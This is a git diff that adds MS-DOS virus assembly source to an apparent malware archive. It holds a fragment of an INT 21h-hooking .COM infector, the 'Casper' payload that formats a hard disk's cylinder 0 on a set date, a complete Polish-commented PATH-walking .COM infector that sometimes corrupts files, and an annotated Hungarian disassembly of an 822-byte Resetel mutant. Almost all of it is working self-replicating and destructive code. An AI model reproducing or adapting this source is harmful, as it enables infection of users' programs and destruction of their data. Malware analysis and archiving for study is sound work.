equal + mov ax,44Bh + iret ; Interrupt return +loc_5: + cmp ax,4B00h + je loc_7 ; Jump if equal + cmp ax,4B03h + je loc_7 ; Jump if equal +loc_6: +;* jmp far ptr loc_19 + db 0EAh,0B5h, 02h, 46h,0D5h +loc_7: + push ax + push bx + push cx + push dx + push ds + push es + push si + push di + mov ax,ds + mov es,ax + cld ; Clear direction + mov al,0 + mov di,dx + mov cx,0C8h + repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al + jnz loc_8 ; Jump if not zero + std ; Set direction flag + mov al,2Eh ; '.' + mov cx,0Ah + repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al +loc_8: + jnz loc_11 ; Jump if not zero + inc di + inc di + mov al,[di] + and al,0DFh + cmp al,43h ; 'C' + jne loc_11 ; Jump if not equal + mov al,[di+1] + and al,0DFh + cmp al,4Fh ; 'O' + jne loc_11 ; Jump if not equal + mov al,[di+2] + and al,0DFh + cmp al,4Dh ; 'M' + jne loc_11 ; Jump if not equal + mov al,[di-2] + and al,0DFh + cmp al,44h ; 'D' + jne loc_9 ; Jump if not equal + mov al,[di-8] + and al,0DFh + cmp al,43h ; 'C' + je loc_11 ; Jump if equal +loc_9: + mov ax,4300h + int 21h ; DOS Services ah=function 43h + ; get attrb cx, filename @ds:dx + mov word ptr cs:[2B4h],cx + mov cx,20h + mov ax,4301h + int 21h ; DOS Services ah=function 43h + ; set attrb cx, filename @ds:dx + jc loc_11 ; Jump if carry Set + mov word ptr cs:[2B0h],ds + mov word ptr cs:[2B2h],dx + mov ax,3D02h + int 21h ; DOS Services ah=function 3Dh + ; open file, al=mode,name@ds:dx + jc loc_11 ; Jump if carry Set + mov bx,ax + mov ax,5700h + int 21h ; DOS Services ah=function 57h + ; get file date+time, bx=handle + ; returns cx=time, dx=time + mov word ptr cs:[2ACh],cx + mov word ptr cs:[2AEh],dx + jmp short loc_12 + nop +loc_10: + jmp loc_6 +loc_11: + jmp loc_16 +loc_12: + mov cx,3 + mov ax,cs + mov ds,ax + mov es,ax + mov dx,2B6h + mov ax,3F00h + int 21h ; DOS Services ah=function 3Fh + ; read file, bx=file handle + ; cx=bytes to ds:dx buffer + mov cx,0 + mov dx,word ptr cs:[2B7h] + add dx,3 + mov ax,4200h + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + mov cx,0Ah + mov dx,29Bh + mov ax,3F00h + int 21h ; DOS Services ah=function 3Fh + ; read file, bx=file handle + ; cx=bytes to ds:dx buffer + cld ; Clear direction + mov cx,0Ah + mov si,29Bh + mov di,data_16e + repe cmpsb ; Rep zf=1+cx >0 Cmp [si] to es:[di] + jz loc_15 ; Jump if zero + mov ax,4202h + xor cx,cx ; Zero register + mov dx,cx + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + cmp ax,6A4h + jb loc_15 ; Jump if below + jmp short loc_14 + nop +loc_13: + jmp short loc_10 +loc_14: + mov cx,cs:data_18e + and cx,0Fh + add cx,5 + mov ax,cs + mov ds,ax + xor dx,dx ; Zero register + mov ax,4000h + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer + jc loc_15 ; Jump if carry Set + mov ax,4202h + xor cx,cx ; Zero register + mov dx,cx + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + sub ax,3 + mov word ptr cs:[2AAh],ax + xor dx,dx ; Zero register + mov ax,4000h + mov cx,2BBh + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer + jc loc_15 ; Jump if carry Set + mov ax,4200h + xor cx,cx ; Zero register + mov dx,cx + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + mov ax,cs + mov ds,ax + mov dx,2A9h + mov ax,4000h + mov cx,3 + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer +loc_15: + mov ax,5701h + mov cx,word ptr cs:[2ACh] + mov dx,word ptr cs:[2AEh] + int 21h ; DOS Services ah=function 57h + ; set file date+time, bx=handle + ; cx=time, dx=time + mov ax,3E00h + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle + mov ds,word ptr cs:[2B0h] + mov dx,word ptr cs:[2B2h] + mov cx,word ptr cs:[2B4h] + mov ax,4301h + int 21h ; DOS Services ah=function 43h + ; set attrb cx, filename @ds:dx +loc_16: + pop di + pop si + pop es + pop ds + pop dx + pop cx + pop bx + pop ax + jmp short loc_13 + nop + add [bx+si],al + push ax + mov ah,30h ; '0' + int 21h ; DOS Services ah=function 30h + ; get DOS version number ax + cmp ax,1E03h +;* je loc_17 ; Jump if equal + db 74h, 09h + stosb ; Store al to es:[di] + stosb ; Store al to es:[di] + stosb ; Store al to es:[di] + stosb ; Store al to es:[di] +;* jmp loc_18 + db 0E9h, 15h, 00h + test ax,3AA5h + push ss + db 0FEh,0B2h,0B9h, 41h, 20h, 00h + db 0B8h, 00h, 4Ch, 02h, 00h + +seg_a ends + + + + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.utility.asm b/MSDOS/Virus.MSDOS.Unknown.utility.asm new file mode 100644 index 00000000..ae7193dc --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.utility.asm @@ -0,0 +1,33 @@ +;**************************************************************************** +;* +;* UTILITY.ASM - Manipulation Task Code For Casper The Virus. * +;* * +;* USAGE: Is automatically INCLUDED in the assembly of casper.asm * +;* * +;* DETAILS: Date Activated Hard Disk Destroyer. * +;* DATE: 1st April DAMAGE: Formats Cylinder 0 of HD. * +;* * +;************************************************************************** + + + + + + mov ah,2ah ; DOS Get Date. + int 21h + cmp dx,0401h ; 5th May. + jne utilend + mov ax,0515h ;Format Cylinder, 15 Sectors. + mov ch,0 ;Cylinder 0. + mov dx,00 ;Head 0, Drive 80h. + mov es,dx ;Junk for address marks. + mov bx,0 ;Junk.... + int 13h ;Do It! + int 20h ;Exit +utilend: jmp entry3 + db "Hi! I'm Casper The Virus, And On April The 1st I'm " + db "Gonna Fuck Up Your Hard Disk REAL BAD! " + db "In Fact It Might Just Be Impossible To Recover! " + db "How's That Grab Ya! " +entry3: + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.v_582.asm b/MSDOS/Virus.MSDOS.Unknown.v_582.asm new file mode 100644 index 00000000..f8eb6a05 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.v_582.asm @@ -0,0 +1,324 @@ +; Kod rdowy wirusa nieznanego autorstwa. Widoczne s silne wpywy 648. +; Dodano wasne komentarze wskazujce na rnice midzy t wersj i oryginaem. +; Komentarze te poprzedzane s znakami AK:. +; Tekst znaleziony na dysku komputera FIDO w PC Kurierze 28 wrzenia 1990. + +comment ; +********************************************************** +wszystkie adresy w programie sa uzywane jako wzgledne +do rejestru si ,nie mozna urzywac adresow bezwzglednych +jako offset poniewaz po 'doklejeniu sie do programu +moze on byc w roznych miejscach +********************************************************** +; +adr_baz equ offset stare_DTA ;adres bazowy poczatku zmiennych + ;w programie wzgledem niego beda + ;obliczane przesuniecia pol zmiennych +start_prg equ 100h ;adres poczatku programu typu .com +ofst_rozk equ offset rozkazy - adr_baz ;przsuniecie pola rozkazy +get_dta_addr equ 2fh ;funkcja dos pobranie adresu DTA +msdos equ 21h +write equ 40h +wirus_len equ DTA + 43 - start + +code segment byte public 'code' + assume cs:code,ds:code,es:code + + org 100h + +st1: jmp short start + + int msdos + +start: mov dx,offset stare_DTA + cld ;ustawienie kierunku przesylania + mov si,dx ;poczatek zmiennych programu + add si,ofst_rozk ;adres pola rozkazy + mov di,100h ;adres pod ktorym jest poczatek programu + mov cx,3 ;ilosc bajtow do przeslania + repz movsb ;odtworzenie starego poczatku + + mov si,dx ;odtworzenie si + +; AK: pominito badanie wersji DOS + + push es ;zachowanie es bo bedzie zmieniane + mov ah,get_dta_addr ;pobierz adres DTA + int msdos + mov [si],bx ;zapamietanie adresu DTA w polu + mov [si+2],es ;stare_DTA + pop es ;odtworzenie es + + mov dx,5Fh ;adres pola DTA + add dx,si + mov ah,1Ah ;ustaw adres DTA ds:dx + int msdos + +; AK: zmieniona jest kolejno instrukcji, teraz do przechowania SI uyto +; DX zamiast stosu + + push es ;zachowanie es + push si ;zachowaj si + add si,1ah ;adres tekstu PATH= + mov dx,si + mov es,ds:[2Ch] ;adres srodowiska set + +; AK: w oryginale jest to PUSH SI, POP SI + + mov di,0 + +szukaj_dalej: + mov si,dx + lodsb + mov cx,8000h ;dlugosc srodowiska + repnz scasb ;szukanie litery P + mov cx,4 ;dlugosc reszty ATH= + +porownuj: + lodsb + scasb + jnz szukaj_dalej + loop porownuj + + pop si ;odtworz rejestry + pop es + + mov [si+16h],di ;adres pierwszego bajtu za PATH= + mov di,si + add di,1Fh ;adres bufora dla nazwy zbioru + mov bx,si + jmp short dalej + +nast_sciezka: + cmp word ptr[si+16h],0 ;czy koniec path + jnz l1 ;nie + + jmp exit1 ;zakoncz nie ma wiecej zbiorow + +l1: push ds + push si + mov ds,es:[2Ch] ;urzywamy es: bo ds bedzie modyfikowany + mov di,si + mov si,es:[di+16h] + add di,1Fh + +next: lodsb ;zaladuj kolejny znak sciezki dostepu + cmp al,';' ;czy koniec definicji scierzki + jz koniec_sciezki + cmp al,0 ;czy koniec lancucha path + jz koniec_set + stosb ;przepisz znak do bufora + jmp short next + +koniec_set: + mov si,0 +koniec_sciezki: + pop bx + pop ds + mov [bx+16h],si ;adres do ktorego przeszukano path + cmp byte ptr [di-1],'\' ;czy scierzka zakonczona przez \ + jz dalej + mov al,'\' + stosb ;dopisz \ + +dalej: mov [bx+18h],di + mov si,bx + add si,10h + mov cx,6 + repz movsb ;przepisanie *.com \0 + mov si,bx + mov ah,4Eh ;find first + mov dx,1Fh + add dx,si + mov cx,3 ;ukryty tylko do odczytu + int msdos + jmp short czy_jest + +szuk_nast: + mov ah,4Fh ;find next + int msdos + +czy_jest: + jnc jest + + jmp short nast_sciezka + +jest: mov ax,[si+75h] ;pole zawierajace czas w DTA + and al,1Fh ;czy sa 62 sekundy + cmp al,1Fh + + jz szuk_nast + cmp word ptr [si+79h],0FA00h + ja szuk_nast ;jesli zbyt dlugi + cmp word ptr [si+79h],10 + jc szuk_nast + + mov di,[si+18h] + push si + add si,7Dh +kopiuj: + lodsb ;kopiuje nazwe zbioru + stosb ;nazwa w postaci ASCIIZ + cmp al,0 ;czy koniec nazwy + jnz kopiuj + pop si + + mov ax,4300h ;pobierz atrybuty zbioru + mov dx,1Fh + add dx,si + int msdos + mov [si+8],cx ;zapamietanie atrybutow + + mov ax,4301h ;ustaw atrybuty + and cx,0FFFEh ;usuwa ewentualne r/o + mov dx,1Fh + add dx,si + int msdos + + mov ax,3D02h ;otwarcie zbioru + mov dx,1Fh + add dx,si + int msdos + + jnc l2 ;czy poprawne otwarcie + + jmp exit2 + +l2: mov bx,ax + mov ax,5700h ;pobierz czas i date powstania zbioru + int msdos + mov [si+4],cx ;czas + mov [si+6],dx ;data + + mov ah,2Ch ;pobierz czas systemowy + int msdos + + and dh,7 ;sekundy + jnz zostaw + +comment ; +********************************************************** +tutaj mozna umiescic dowolna procedure uszkadzajaca zbior +ta wywolywana jest losowo jesli ostatnie trzy bity sekund +zegara systemu sa rowne zero np. 8,16,24 itd. +********************************************************** +; + mov ah,write ;zapis do zbioru + mov cx,5 ;pieciu bajtow lezacych + mov dx,si ;juz poza programem czyli + add dx,8Ah ;faktycznie dowolnych + int msdos + jmp exit3 + +;********************************************************* +;koniec procedury uszkadzajacej zbior +;********************************************************* + +zostaw: mov ah,3Fh ;odczyt trzech pierwszych + mov cx,3 ;bajtow z pliku + mov dx,ofst_rozk ;do pola rozkazy + add dx,si + int msdos + + jc exit3 ;jesli byl blad czytania + + cmp ax,3 ;czy odczytano dokladnie + jnz exit3 ;trzy bajty + + mov ax,4202h ;przewiniecie zbioru na koniec + mov cx,0 + mov dx,0 + int msdos + + jc exit3 ;jesli blad + + mov cx,ax ;w ax dlugosc zbioru + sub ax,3 +;obiczanie przesuniecia dla skoku do poczatku wirusa +;jest to adres konca zbioru minus 3 poniewaz +;jmp jest trzy bajtowy + + mov [si+0Eh],ax ;zapis adresu w polu skok + + add cx,adr_baz - start + start_prg +;obliczanie adresu poczatku danych (tego ktory jest w si) +;jest to adres pola stare_DTA + 100h przesuniecia programu + + mov di,si + sub di,adr_baz - start - 1 + mov [di],cx ;zapisanie adresu bezposrednio w pole + ;w pole rozkazu mov dx,offset + + mov ah,write ;dopisanie wirusa na koniec + mov cx,wirus_len ;dlugosc wirusa + mov dx,si + sub dx,adr_baz - start ;obliczenie adresu poczatku wirusa + int msdos + + jc exit3 ;jesli blad + cmp ax,wirus_len ;czy zapisano calego wirusa + jnz exit3 + + mov ax,4200h ;przewiniecie zbioru na poczatek + mov cx,0 + mov dx,0 + int msdos + + jc exit3 ;jesli blad + + mov ah,write ;zapis jmp do wirusa + mov cx,3 ;na poczatku + mov dx,si + add dx,0Dh ;pole skok + int msdos + +exit1: mov dx,[si+6] ;data + mov cx,[si+4] ;czas + or cx,1Fh ;zaznaczenie ze zbior jest zarazony + ;ilosc sekund = 62 + + mov ax,5701h ;zapis daty i czasu do zbioru + int msdos + + mov ah,3Eh ;zamkniecie zbioru + int msdos + +exit2: mov ax,4301h ;ustawienie atrybutow + mov cx,[si+8] ;stare atrybuty + mov dx,001Fh + add dx,si + int msdos + +exit3: push ds + mov ah,1Ah ;ustaw adres DTA + mov dx,[si+0] ;pole stare_DTA + mov ds,es:[si+2] + int msdos + + pop ds + + xor ax,ax ;zerowanie rejestrow + xor bx,bx + xor dx,dx + xor si,si + mov di,0100h ;na stos adres startu + push di + xor di,di + ret + +stare_DTA dd 0 +czas_zb dw 0 +data_zb dw 0 +attr_zb dw 0 +rozkazy db 0b4h,4ch,0cdh +skok db 0e9h,0,0 ;kod rozkazu jmp +zbior db '*.com',0 +srodow dw 0 ;adres srodowiska set +bufor dw 0 ;wskaznik do nazwy zbioru +path db 'PATH=' +nazwa_zb db 63 dup(0) ;pole na nazwe zbioru +DTA db 43 dup(0) ;pole dta + +code ends + end st1 + diff --git a/MSDOS/Virus.MSDOS.Unknown.v_822.asm b/MSDOS/Virus.MSDOS.Unknown.v_822.asm new file mode 100644 index 00000000..381cc2c0 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.v_822.asm @@ -0,0 +1,669 @@ + + + A Resetel vrus Tltget fle mutnsa + *************************************** + + +A Resetel vrussal teljes egszben megegyezik a fertz mechanizmus. +Eltekintve attl, hogy ez a mutns nem tesz tnkre fjlokat. Az adatterlet is +ugyanazon a cmen van, gy ugyangy lehet rtani, mint a Resetelt. A vltozs: +a vrus hossza 822 byte, minden indts utn az A:-rl megprblja beolvasni a +BOOT-ot, majd a 40/80-dik svot. Ha valamelyik Tltgetvel fertztt, akkor +elindtja a Tltgett ! + + + ;Ide (0100-ra) mutat a file elejrl az ugr utasts. + + ;Els feladat: az els 3 byte visszarsa az eredetire. + +0100 51 PUSH CX ;CX a stacken marad mindvgig. + ;A kvetkez utasts operandust ( jelen esetben 02F9-et ) + ;fertzskor lltja be , gy mindig a helyes cmre mutat. +0101 BAF902 MOV DX,02F9 ;Eredeti els 3 byte cme-10h +0104 FC CLD ;( ERE_DTA_OFS) +0105 8BF2 MOV SI,DX +0107 81C60A00 ADD SI,000A ;SI=offset ERE_KEZD +010B BF0001 MOV DI,0100 ;Program eleje +010E B90300 MOV CX,0003 ;3 byte +0111 F3 REPZ +0112 A4 MOVSB ;Az eredeti byteok visszalltsa + + + ;----------------------------------------- + ; Installcis rsz: + ;----------------------------------------- + + ;DOS verzi lekrdezse. 1.00-nl kisebb verzinl az eredeti + ;program futtatsa: ekkor a vrus nem mkdik. + +0113 8BF2 MOV SI,DX ;Ezutn SI-ben az adatterlet cme +0115 B430 MOV AH,30 +0117 CD21 INT 21 ;DOS verzi lekrdezse +0119 3C00 CMP AL,00 ;Csak 1.00-nl kisebbnl lp ki +011B 7503 JNZ 0120 +011D E9C701 JMP 02E7 ;Eredeti program futtatsa + + + ;Disk Transzfer Address lekrdezse, elmentse + +0120 06 PUSH ES +0121 B42F MOV AH,2F +0123 CD21 INT 21 ;DTA leolvassa (ES:BX), megrzse +0125 899C0000 MOV [SI+0000],BX ;ERE_DTA_OFS (02F9) +0129 8C840200 MOV [SI+0002],ES ;ERE_DTA_SEG (02FB) + + ;------------------------------------------------------- + ; A beiktatott behz rsz + ;------------------------------------------------------- + +012D E85802 CALL 0388 +0130 07 POP ES + + ;DTA belltsa ENTRY cmre (0358). Igy a FindFirst, FindNext + ;DOS funkcik ide fogjk msolni a file adatait (nevt,idejt, + ;hosszt,stb). + +0131 BA5F00 MOV DX,005F + ;{Valsznleg rgi assemblerrel rtk a vrust, ezrt van itt + ;egy NOP utasts.} +0134 90 NOP +0135 03D6 ADD DX,SI +0137 B41A MOV AH,1A +0139 CD21 INT 21 ;DTA lltsa DS:DX-re: ENTRY(0358) + + + ;A PATH-ok cmnek megkeresse. Ha az aktulis knyvtrban mr + ;mindegyik filet megfertzte , itt tajlja meg azoknak az al- + ;knyvtraknak a nevt , amelyekben mg megfertzend fileokat + ;tallhat. + +013B 06 PUSH ES +013C 56 PUSH SI +013D 8E062C00 MOV ES,[002C];Environment (krnyezet) segmense +0141 BF0000 MOV DI,0000 ;ES:DI fog a megfelel helyre + ;(a kvetkez directoryra) mutatni + + + ;A kvetkez rsz a PATH= szveget keresi meg az environment + ;terleten: + +0144 5E POP SI +0145 56 PUSH SI +0146 81C61A00 ADD SI,001A ;STR_PATH (0313) +014A AC LODSB ;AL=DS:[SI],SI++ +014B B90080 MOV CX,8000 ;max 32k az environment +014E F2 REPNZ +014F AE SCASB ;AL-ES:[DI] Megkeresi a kvetkez + ;'P' bett +0150 B90400 MOV CX,0004 ;Mg 4 bet azonostsa +0153 AC LODSB ;AL=DS:[SI],SI++ +0154 AE SCASB ;AL-ES:[DI],DI++ +0155 75ED JNZ 0144 ;Ugrs, ha a kvetkez 4 bet nem + ;egyezik (nem 'ATH=') +0157 E2FA LOOP 0153 +0159 5E POP SI ;ES:DI mutat az els PATH-ra +015A 07 POP ES +015B 89BC1600 MOV [SI+0016],DI ;PATH_MUT (030F) + + +015F 8BFE MOV DI,SI ;{Hogy ez minek ? Ksbb gyis +0161 81C71F00 ADD DI,001F ;fellrja} FILE_PATH (0318) +0165 8BDE MOV BX,SI ;Ezutn BX mutat az adatokra +0167 81C61F00 ADD SI,001F ;SI is a FILE_PATH-ra(0318) mutat +016B 8BFE MOV DI,SI ;{Az elbb mr bellitotta (?)} +016D EB3A JMP 01A9 + + + ;A kvetkez PATH-ban megadott aldirectoryt FILE_PATH-ra m- + ;solja. Igy a kvetkez fileokat mr ebben az aldirectoryban + ;fogja keresni. + +016F 83BC160000 CMP WORD PTR [SI+0016],+00 ;PATH_MUT (030F) +0174 7503 JNZ 0179 +0176 E96001 JMP 02D9 ;Ugrs, ha nincs tbb PATH aldir. + ;(mindet megfertte mr) +0179 1E PUSH DS +017A 56 PUSH SI +017B 26 ES: +017C 8E1E2C00 MOV DS,[002C] ;Environment segmense +0180 8BFE MOV DI,SI ;(02F9) +0182 26 ES: +0183 8BB51600 MOV SI,[DI+0016] ;PATH_MUT (030F) +0187 81C71F00 ADD DI,001F ;FILE_PATH cme (0318) +018B AC LODSB ;AL=DS:[SI] SI++ +018C 3C3B CMP AL,3B ;';' +018E 740A JZ 019A +0190 3C00 CMP AL,00 +0192 7403 JZ 0197 +0194 AA STOSB ;ES:[DI]:=AL DI++ +0195 EBF4 JMP 018B ;tmsols ';' vagy #0-ig + + ;#0-val zrult a PATH bejegyzs => nem lesz tbb +0197 BE0000 MOV SI,0000 +019A 5B POP BX ;Ezutn BX mutat az adatokra +019B 1F POP DS +019C 89B71600 MOV [BX+0016],SI ;PATH_MUT (030F) = 0 + ;( Nincs tbb PATH jelzs ) + + ;A kvetkez PATH-ban adott aldir. mr tmsolva. +01A0 807DFF5C CMP BYTE PTR [DI-01],5C +01A4 7403 JZ 01A6 ;Ugrs, ha az utls bet a '\' +01A6 B05C MOV AL,5C ;Egybknt '\' rs +01A8 AA STOSB ;ES:[DI]:=AL DI++ + + + + + ;Egy aldirectory kirtkelse . Elszr az aktulis , majd a + ;FILE_PATH -ra msolt aldirectory vgignzse, fertzs. + ;DI a FILE_PATH-ba rt aldirectory neve utni pozicira mutat. + + + ;A COM kiterjeszts fileok megkeresse: + +01A9 89BF1800 MOV [BX+0018],DI ;FILE_NEV_MUT (0311) + ;Ide kell majd a file nevt + ;msolni (az aldir. neve utn) +01AD 8BF3 MOV SI,BX ;(02F9) +01AF 81C61000 ADD SI,0010 ;KERES_STR (0309) +01B3 B90600 MOV CX,0006 ;6 bet tmsolsa ('*.COM',0) +01B6 F3 REPZ ;A PATH-ban megadott aldirectory +01B7 A4 MOVSB ;mg , gy teljes keressi utunk + ;lesz +01B8 8BF3 MOV SI,BX ;(02F9) +01BA B44E MOV AH,4E ;FIND FIRST ENTRY +01BC BA1F00 MOV DX,001F +01BF 90 NOP +01C0 03D6 ADD DX,SI ;FILE_PATH (0318) +01C2 B90300 MOV CX,0003 ;HIDDEN, READ ONLY +01C5 CD21 INT 21 ;Az els COM kiterjeszts file + ;megkeresse . A file adatait a DTA + ;ltal mutatott cmre (ENTRY 0358) + ;msolja. +01C7 EB04 JMP 01CD + + + ;Kvetkez COM file keresse (adatai ENTRY-re kerlnek). + +01C9 B44F MOV AH,4F ;FIND NEXT +01CB CD21 INT 21 +01CD 7302 JNB 01D1 +01CF EB9E JMP 016F ;Ha nem tall tbb COM filet : j + ;aldirt keres a PATH-ban + + + ;Mr tallt COM filet. Adataival az ENTRY fel van tltve.Ennek + ;a filenak az ellenrzse, fertzse kvetkezik. + + ;Annak ellenrzse , hogy a file megfertzhet-e (fertztt-e, + ;tl hossz-e, tl rvid-e) . Ha nem fertzhet visszaugrik j + ;fileokat keresni. + +01D1 8B847500 MOV AX,[SI+0075] ;ENT_IDO (036E) A file ideje +01D5 241F AND AL,1F +01D7 3C1F CMP AL,1F ;Ugrs, ha az als 5 bit 1-es: +01D9 74EE JZ 01C9 ;a file mr fertztt. +01DB 81BC790000FA CMP WORD PTR [SI+0079],FA00 ;ENT_HOSSZ (0372) +01E1 77E6 JA 01C9 ;Ugrs, ha file hossza nagyobb,mint + ;64000h (mr nem fr bele a vrus) +01E3 83BC79000A CMP WORD PTR [SI+0079],+0A ;ENT_HOSSZ (0372) +01E8 72DF JB 01C9 ;Ugrs, ha rvidebb 10h bytenl + + + ;----------------------------------------- + ; Megvan a kivlaszott file. + ;----------------------------------------- + + ;A file nevt az aldirectory neve utn kell msolni , hogy a + ;teljes t rendelkezsnkre lljon , gy majd meg tudja nyitni + ;a filet. +01EA 8BBC1800 MOV DI,[SI+0018] ;FILE_NEV_MUT (0311) Ide fogja +01EE 56 PUSH SI ;a file nevt msolni +01EF 81C67D00 ADD SI,007D ;ENT_NEV (0376) + +01F3 AC LODSB ;AL:=DS:[SI] SI++ +01F4 AA STOSB ;ES:[DI]:=AL DI++ (Msols) +01F5 3C00 CMP AL,00 ;Nvlezr 0-ig msol +01F7 75FA JNZ 01F3 +01F9 5E POP SI ;SI jra az adatokra mutat + + + ;A file egyes eredeti informciinak megrzse , hogy a fert- + ;zs ne tnjn fel. + + ;Az eredeti attributtum megrzse: + + ;{Fogalmam sincs mirt kell a file attributtumt mg egyszer + ;lekrdezni , amikor az ENTRY terleten megtallhat . Taln a + ;vrus rja nem tudta?} +01FA B80043 MOV AX,4300 ;File attributtumnak lekrdezse +01FD BA1F00 MOV DX,001F ;FILE_PATH ([SI+1F] 0318) +0200 90 NOP ;{piszok} +0201 03D6 ADD DX,SI ;DS:DX mutat a file tjra +0203 CD21 INT 21 ;CX-ben az attributtum +0205 898C0800 MOV [SI+0008],CX ;ERE_ATTR (0301) + + + ;A file rsvdelmnek trlse: + +0209 B80143 MOV AX,4301 ;File attributtumnak llitsa +020C 81E1FEFF AND CX,FFFE ;Read Only jelzs trlse +0210 BA1F00 MOV DX,001F ;{ Az elbb mr belltotta, minek +0213 90 NOP ;jra? } +0214 03D6 ADD DX,SI ;FILE_PATH (0318) +0216 CD21 INT 21 + + + ;File megnyitsa: + +0218 B8023D MOV AX,3D02 ;File megnyitsa rsra, olvassra +021B BA1F00 MOV DX,001F ;{Mg egyszer belltja!} +021E 90 NOP ;{piszok} +021F 03D6 ADD DX,SI ;FILE_PATH (0318) +0221 CD21 INT 21 +0223 7303 JNB 0228 +0225 E9A200 JMP 02CA ;Hibnl: nincs fertzs +0228 8BD8 MOV BX,AX ;Handle + + + ;A file eredeti (mostani) idejnek lekrdezse: + + ;{Ez is megtallhat lenne az ENTRY terleten!} +022A B80057 MOV AX,5700 ;Get Date & Time +022D CD21 INT 21 +022F 898C0400 MOV [SI+0004],CX ;ERE_TIME (02FD) +0233 89940600 MOV [SI+0006],DX ;ERE_DATE (02FF) + + + ;Annak eldntse , hogy a kivlasztott filet tnkretegye-e , + ;vagy megfertzze . Lekrdezi a jelenlegi idt , s ha msod- + ;perceinek szma 8-cal oszthat , akkor a filet resetelv te- + ;szi, egybknt pedig megfertzi. Igy az esetek 2/15-d rsz- + ;ben teszi csak tnkre a filet. + +0237 B42C MOV AH,2C ;A mostani id lekrdezse +0239 CD21 INT 21 +023B 80E607 AND DH,07 ;A msodpercek als 3 bitje +023E EB0D JMP 024D ;Fertzs +0240 90 NOP + + + ; Szemt a Reseletlbl + +0241 B440 MOV AH,40 +0243 B90500 MOV CX,0005 +0246 8BD6 MOV DX,SI +0248 81C28A00 ADD DX,008A +024C 90 NOP + + ;----------------------------------------- + ; Fertzs: + ;----------------------------------------- + + + ;Az eredeti file els 3 bytejnak megrzse , hogy ksbb mg + ;futtatni lehessen. +024D B43F MOV AH,3F ;Olvass filebl +024F B90300 MOV CX,0003 ;Az els 3 byte beolvassa +0252 BA0A00 MOV DX,000A +0255 90 NOP ;{piszok} +0256 03D6 ADD DX,SI ;ERE_KEZD (0303) +0258 CD21 INT 21 +025A 7255 JB 02B1 ;Hibnl vge +025C 3D0300 CMP AX,0003 +025F 7550 JNZ 02B1 ;Hibnl vge + + + ;File vgre lls, az j cmek kiszmtsa: + +0261 B80242 MOV AX,4202 ;File Pointer file vgre lltsa +0264 B90000 MOV CX,0000 +0267 BA0000 MOV DX,0000 +026A CD21 INT 21 +026C 7243 JB 02B1 ;{Itt nem nagyon lehet hiba!} + + + ;A file elejre irand JMP operandusnak kiszmtsa: + +026E 8BC8 MOV CX,AX ;AX-ben a file hossza +0270 2D0300 SUB AX,0003 ;AX-ben az eltols a JMP utasts- + ;hoz, ahhoz amit a file elejre fog + ;majd rni . Igy ez a JMP a file + ;mostani vge utni bytera fog mu- + ;tatni. +0273 89840E00 MOV [SI+000E],AX ;CIM_JMP (0307) + + + ;Az j fileon belli adatterlet cmnek kiszmtsa s bel- + ;ltsa: + +0277 81C1F902 ADD CX,02F9 ;CX az j fileon belli adatter- +027B 8BFE MOV DI,SI ;letre mutat. +027D 81EFF701 SUB DI,01F7 ;A vrus els utastsnak (MOV DX, + ;02F9) operandusnak cme. +0281 890D MOV [DI],CX ;Ide rja az adatterlet cmt + + + ;----------------------------------------- + ; A vrus hozzmsolja magt a filehoz: + ;----------------------------------------- + + ;(A filemutat a file vgre mutat.) +0283 B440 MOV AH,40 ;Irs fileba. +0285 B93603 MOV CX,0336 ;822 byte (a vrus hossza) +0288 8BD6 MOV DX,SI +028A 81EAF901 SUB DX,01F9 ;DX a vrus els bytejra mutat +028E CD21 INT 21 +0290 721F JB 02B1 ;Hibnl vge +0292 3D3603 CMP AX,0336 +0295 751A JNZ 02B1 ;Ha nem rta ki mind a 648 byteot + + + ;Az els 3 byte tlltsa, egy a file vgre mutat ugr uta- + ;stsra: + +0297 B80042 MOV AX,4200 ;A file pointer a file elejre! +029A B90000 MOV CX,0000 +029D BA0000 MOV DX,0000 +02A0 CD21 INT 21 +02A2 720D JB 02B1 ;{Itt sem lehet hiba!} + +02A4 B440 MOV AH,40 ;Irs fileba +02A6 B90300 MOV CX,0003 ;3 byte +02A9 8BD6 MOV DX,SI +02AB 81C20D00 ADD DX,000D ;B_JMP (0306) DX az ugr utastsra +02AF CD21 INT 21 ;mutat + + + ;Az eredeti id ( mr a fertzsjelzssel egytt ) visszall- + ;tsa: + +02B1 8B940600 MOV DX,[SI+0006] ;ERE_DATE (02FF) +02B5 8B8C0400 MOV CX,[SI+0004] ;ERE_TIME (027D) +02B9 81E1E0FF AND CX,FFE0 ;{Teljesen felesleges!} +02BD 81C91F00 OR CX,001F ;Mr volt fertzve jelzs +02C1 B80157 MOV AX,5701 ;Set Date & Time +02C4 CD21 INT 21 + + + ;A file lezrsa: + +02C6 B43E MOV AH,3E ;Close Handle +02C8 CD21 INT 21 + + + ;Az eredeti attributtum visszalltsa: + +02CA B80143 MOV AX,4301 ;Set File Attributtum +02CD 8B8C0800 MOV CX,[SI+0008] ;ERE_ATTR (0301) +02D1 BA1F00 MOV DX,001F +02D4 90 NOP +02D5 03D6 ADD DX,SI ;FILE_PATH (0318) +02D7 CD21 INT 21 + + + ;DTA visszalltsa az eredeti cmre: + +02D9 1E PUSH DS +02DA B41A MOV AH,1A ;Set DTA +02DC 8B940000 MOV DX,[SI+0000] ;ERE_DTA_OFS (02F9) +02E0 8E9C0200 MOV DS,[SI+0002] ;ERE_DTA_SEG (02FB) +02E4 CD21 INT 21 +02E6 1F POP DS + + + ;----------------------------------------- + ; Az eredeti program futtatsa: + ;----------------------------------------- + +02E7 59 POP CX ;CX 